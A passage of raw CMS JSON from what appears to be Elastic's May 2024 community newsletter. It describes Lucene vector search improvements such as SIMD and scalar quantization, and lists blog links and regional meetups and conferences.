Traditionally, these operations were backed by scalar implementations, leaving performance enhancements to the JIT compiler. However, recent advancements introduce a paradigm shift with the Panama Vector API that interfaces with Single Instruction Multiple Data (SIMD) instructions, enabling developers to express these operations explicitly for optimal performance — with Lucene and Elasticsearch making excellent use of them.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eScalar quantization:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Memory consumption has long been a concern for efficient vector database operations. By embracing byte quantization, Lucene slashes memory usage by approximately 75%, offering a viable solution to the memory-intensive nature of vector search operations. Lucene’s implementation uses scalar quantization, a lossy compression technique that transforms raw data into a compressed form, sacrificing some information for space efficiency. It achieves remarkable space savings with minimal impact on recall, making it an ideal solution for memory-constrained environments.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTo make compression even better, we aimed to reduce each dimension from seven bits to just four bits. Our main goal was to compress data further while still keeping search results accurate. By making some improvements, we managed to compress data by a factor of eight without making search results worse by adding a smart error correction system.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eMulti-vector integration:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Lucene's \"join\" functionality — integral to Elasticsearch's nested field type — enables multiple nested documents within a top-level document, allowing searches across nested documents and subsequent joins with their parent documents. Instead of having a single piece of metadata indicating, for example, a book's chapter, you now have to index that information data for every sentence.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eVector database optimized instance on Google Cloud:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e To be most performant, HNSW requires the vectors to be cached in the node's off-heap memory. With this in mind, the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elasticsearch-vector-profile-gcp\" target=\"_self\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic Cloud Vector Search optimized hardware profile\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e is configured with a smaller than standard Elasticsearch JVM heap and disk setting. This provides more RAM for caching vectors on a node, allowing you to provision fewer nodes for your vector search use cases.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csd7b70f2d06f1b2ed"}}},{"image":{"image":{"uid":"blt5ffbe53fb6d1e81f","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2024-05-09T15:36:26.404Z","created_by":"blt96ac6007eba0a223","file_size":"206311","filename":"image_newsletter_may.png","parent_uid":null,"tags":[],"title":"image_newsletter_may.png","updated_at":"2024-05-09T15:36:26.404Z","updated_by":"blt96ac6007eba0a223","publish_details":{"time":"2024-05-10T20:21:26.770Z","user":"blt96ac6007eba0a223","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt5ffbe53fb6d1e81f/663ced7af8baf0ad6aa765d0/image_newsletter_may.png"},"_metadata":{"uid":"csbba24da9fb93d864"},"caption_l10n":"","alt_text_l10n":"Vector database optimized instance on Google Cloud.","disable_lightbox":false,"remove_shadow":false,"sizing":{"sizing_options":null}}},{"title_text":{"title_text":[{"title_l10n":"Blogs, videos, and interesting links","_metadata":{"uid":"cs2eecc070cb6d6a45"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eScalar quantization in Lucene:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Benjamin Trent and Thomas Veasey share their in-depth two-part series about \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/int4-scalar-quantization-in-lucene\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eInt4: more scalar quantization in Lucene\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/vector-db-optimized-scalar-quantization\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003escalar quantization optimized for vector databases\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and how to use byte or half-byte sized integers instead of floats (4 bytes) per vector dimension.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eElastic web crawler:\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e If you’re looking for a concrete example of how to \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/elastic-web-crawler-add-search-website\"\u003e\u003cspan style='font-size: 12pt;'\u003euse the Elastic web crawler\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, Lionel Palacin demonstrates it with a website where we want to add search.\u003c/span\u003e\u003c/p\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e.NET client:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Learn about \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/net-client-evolution\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ethe evolution of the Elasticsearch .NET client\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e and how it will gradually phase out the old NEST library with Florian Bernd.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003ekNN search:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Panagiotis Bailis explains the \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/simplifying-knn-search\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003esimplification of kNN search\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e. \u003cspan data-type='inlineCode'\u003ek\u003c/span\u003e and \u003cspan data-type='inlineCode'\u003enum_candidates\u003c/span\u003e are now optional. But picking good default values for them was a tricky undertaking and the blog post shows how we got there.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eUniversal profiling agent:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e The Elastic Universal Profiling agent is now open source and in the process of being donated to OpenTelemetry. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-universal-profiling-agent-open-source\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLearn more about it\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e with Israel Ogbole and Christos Kalkanis. Luca Wintergerst and Tim Rühsen explore \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/elastic-universal-profiling-performance-improvements-reduced-costs\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehow Elastic’s Universal Profiling can improve performance and reduce costs\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e by fixing issues in Logstash.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eChatGPT and Elasticsearch:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Follow Sandra Gonzales to learn \u003c/span\u003e\u003ca href=\"https://www.elastic.co/search-labs/blog/chatgpt-elasticsearch-creating-custom-gpts-with-elastic-data\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ehow to develop a custom GPT\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e step by step. It’s your own version of ChatGPT that retrieves custom data from Elasticsearch, which can add both current and proprietary context.\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003eElastic Contributor Program:\u003c/strong\u003e\u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Explore three reasons why you should become an Elastic community ambassador \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003eand \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003echeck out the winners of the 2024 cycle in \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/3-reasons-why-you-should-become-an-elastic-community-ambassador\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eUlly Sampaio’s blog\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csc0956c27a0e99b50"}}},{"title_text":{"title_text":[{"title_l10n":"Featured blogs from the community","_metadata":{"uid":"cs81fa3f7f5b5edb57"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003eLearn how to do \u003ca href=\"https://netflixtechblog.com/reverse-searching-netflixs-federated-graph-222ac5d23576\" target=\"_blank\"\u003ereverse search within Netflix’s federated graph\u003c/a\u003e with Ricky Gardiner, Alex Hutter, and Katie Lefevre.\u003c/li\u003e\u003cli\u003eHugo Chargois demonstrates how to \u003ca href=\"https://medium.com/synthesio-engineering/how-we-reclaimed-100-tb-of-storage-with-a-single-elasticsearch-api-call-c563387ae7fb\" target=\"_blank\"\u003ereclaim 100 TB+ of storage\u003c/a\u003e with better tuned Elasticsearch mappings.\u003c/li\u003e\u003cli\u003eGet an overview of \u003ca href=\"https://lazypro.medium.com/elasticsearch-index-lifecycle-management-in-a-nutshell-278072a9aab6\" target=\"_blank\"\u003eElasticsearch’s Index Lifecycle Management\u003c/a\u003e from Chunting Wu.\u003c/li\u003e\u003cli\u003eSagar Gangurde explains \u003ca href=\"https://medium.com/bigdata-blog/how-to-use-elasticsearch-as-vector-database-5f1768f7d46a\" target=\"_blank\"\u003ehow to use Elasticsearch as a vector database\u003c/a\u003e.\u003c/li\u003e\u003c/ul\u003e"}],"_metadata":{"uid":"cs7b74b26c9c96247a"}}},{"title_text":{"title_text":[{"title_l10n":"Upcoming events and meetups","_metadata":{"uid":"cs4e47dab5d9713863"},"header_style":"H2","paragraph_l10n":""}],"_metadata":{"uid":"cse733a06e918cfc40"}}},{"title_text":{"title_text":[{"title_l10n":"Americas","_metadata":{"uid":"cs4af7710e1eb1160c"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-united-states-and-canada-virtual/events/300034648/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eVirtual Meetup:\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e Aggregations, the Elasticsearch Group By — May 15\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/es-ES/elastic-silicon-valley-user-group/events/300190108/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Silicon Valley:\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e OTel Collector for log collection + Elasticsearch in the United States House — May 15\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/es-ES/lancaster-elastic-user-group/events/pnqvjtygchbtb/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Lancaster:\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e Monthly Meetup — May 15\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e\u003c/span\u003e\u003ca href=\"https://www.meetup.com/goiania-elastic-fantastics/events/300658181/?isFirstPublish=true\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Goiânia:\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e Esquenta para o Cloud Summit Cerrado 2024 — May 15\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e\u003c/span\u003e\u003ca href=\"https://www.cloudsummitcerrado.com.br/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eCloud Summit Cerrado 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, Goiânia — \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eMay 15–16\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://us.pycon.org/2024/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003ePyCon US\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e, Pittsburgh — \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eMay 15–23\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003c/span\u003e\u003ca href=\"https://devopsdays.org/events/2024-sao-paulo/welcome/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eDevOpsDays São Paulo 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e—\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e May 18\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/es-ES/elastic-seattle-user-group/events/300613417/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Seattle:\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e Streamlining Generative AI with Elastic \u0026amp; Azure's OpenAI Integration \u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e— May 20\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/es-ES/elastic-dallas-user-group/events/300615326/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Dallas:\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e do MORE with stateLESS —\u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e May 21\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://build.microsoft.com/en-US/home\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMicrosoft Build: How will AI shape your future?\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e,\u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003eSeattle and online — May 21–23\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-austin-user-group/events/300478141/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Austin:\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003ePutting Insights into Motion with Elastic \u0026amp; Tines + do MORE with stateLESS \u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e— May 22\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-st-louis-user-group/events/300034564/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in St. Louis:\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e Transforming Underutilized Media Assets into Valuable Resources\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e \u003c/span\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e— May 23\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://devopsdays.org/events/2024-montreal/welcome/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eDevOpsDays Montréal\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e — May 27-28\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e\u003c/span\u003e\u003ca href=\"https://www.meetup.com/belo-horizonte-elastic-fantastics/events/300787918/?isFirstPublish=true\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Belo Horizonte\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e: 2° Meetup Elastic \u0026amp; Dito em BH — May 28\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-quebec-city-user-group/events/300596644/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Québec\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e: GenAI à travers la sécurité et l'observabilité — May 30\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.opensourcenorth.com/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eOpen Source North\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e, Minnesota — June 5\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/minneapolis-elastic-user-group/events/300353306\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Minneapolis:\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e Elasticsearch \u0026amp; GitLab's AI-Powered DevSecOps Platform — June 6\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-cleveland-user-group/events/300437771/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eWorkshop in Pennsylvania\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e: Elastic \u0026amp; Federal Resources Corporation: Elastic Security Analyst Workshop — June 6\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e\u003c/span\u003e\u003ca href=\"https://www.meetup.com/elastic-silicon-valley-user-group/events/300578728/\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Silicon Valley:\u003c/span\u003e\u003c/a\u003e\u003cspan style='color:rgb(34, 34, 34);font-size: 12pt;'\u003e Better Together: Elasticsearch and the Dremio Lakehouse — June 6\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cscbabe71e5e9ab2a1"}}},{"title_text":{"title_text":[{"title_l10n":"Europe, Middle East, and Africa","_metadata":{"uid":"cs320a2a34097cc43e"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://2024.europe.jcon.one\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eJCON Europe\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, Cologne — May 13–16\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-portugal/events/300448282\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMeetup in Lisbon\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Optimize Your Operations with PagerDuty Elastic Integration with Elastic and PagerDuty\u0026nbsp; — May 14\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-switzerland/events/299954908/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMeetup in Zurich:\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Scaling Threat Detection for Migros with Efficient Network Flow Data Storage — May 15\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://2024.geecon.org\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGeecon 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, Krakow — May 15–17\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://lu.ma/mlops-london-may-16\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMLOps Community London\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: — May 16\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://2024.phpday.it\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003ePHPday 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, Verona — May 16–17\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/alpesjug/events/299609510/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAlpes JUG\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, Meylan —\u0026nbsp; May 14\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://genevajug.ch/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eGeneva JUG\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — May 15\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/lyonjug/events/300674391/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eLyon JUG\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — May 16\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.eventbrite.fr/e/billets-tadx-elasticsearch-query-language-esql-898049850277\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eTADx\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Elasticsearch Query Language: ES|QL, Tours (FR) — May 21\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://community.codemotion.com/codemotion-espana/meetups/codemotion-conference-madrid\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCodemotion Madrid\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — May 21–22\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://brussels.voxxeddays.com\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eVoxxed Days Brussels\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — May 21–22\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://infoshare.pl\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eInfoshare 2024\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, Gdańsk\u0026nbsp; — May 22–23\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"http://www.meetup.com/goteborg-elastic-fantastics/events/300284109\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMeetup in Göteborg\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Exploring Vector Search \u0026amp; AI Ops in Elastic Observability — May 23\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-nl/events/300284428/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMeetup in Amsterdam\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Elastic \u0026amp; AWS — May 23\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elasticsearch-bulgaria-user-group/events/299653357/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMeetup in Sofia:\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e Vector Search \u0026amp; ES|QL @ FFW — May 28\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://jprime.io/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eJPrime\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, Sofia — May 28–29\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/helsinki-elastic-fantastics/events/300467308/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMeetup in Helsinki\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Elasticsearch Piped Query Language (ES|QL) with Elastic and Nordicmind — May 30\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://coter-numerique.org/congres-2024/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eCoTeR numériqu\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e, La Rochelle — June 4–5\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/morning-talks/events/299907521/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAI and Elasticsearch: Entering a New Era with Elastic\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Prague — June 5\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003ca href=\"https://www.meetup.com/elastic-belgium-user-group/events/300858722\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMeetup in Brussels\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: GenAI with Elastic and Microsoft — June 6\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003ca href=\"https://devfest.gdglille.org/\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eDevFest Lille\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e — June 6–7\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs58521f0d616c2113"}}},{"title_text":{"title_text":[{"title_l10n":"Asia-Pacific","_metadata":{"uid":"cs15beec6af5457b04"},"header_style":"H3","paragraph_l10n":"\u003cp\u003e\u003ca href=\"https://www.meetup.com/Mumbai-Elastic-Fantastics/events/300724013\" target=\"_blank\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eMeetup in Mumbai\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e: Elastic Observability Day — May 18\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cp\u003e\u003ca href=\"https://elastic.huodongxing.com/event/4752749041100?qd=8839540364256\" target=\"_blank\"\u003e\u003cspan style='font-size: 12pt;'\u003eMeetup in Shanghai\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e: Elasticsearch new piped query language (ES|QL) — May 25\u003c/span\u003e\u003c/p\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eJoin your local \u003c/span\u003e\u003ca href=\"http://meetup.com/pro/elastic/\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eElastic meetup group\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e for the latest news on upcoming events. If you’re interested in presenting at a meetup, send an email to \u003c/span\u003e\u003ca href=\"mailto:meetups@elastic.co\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003emeetups@elastic.co\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 10pt;\"\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be 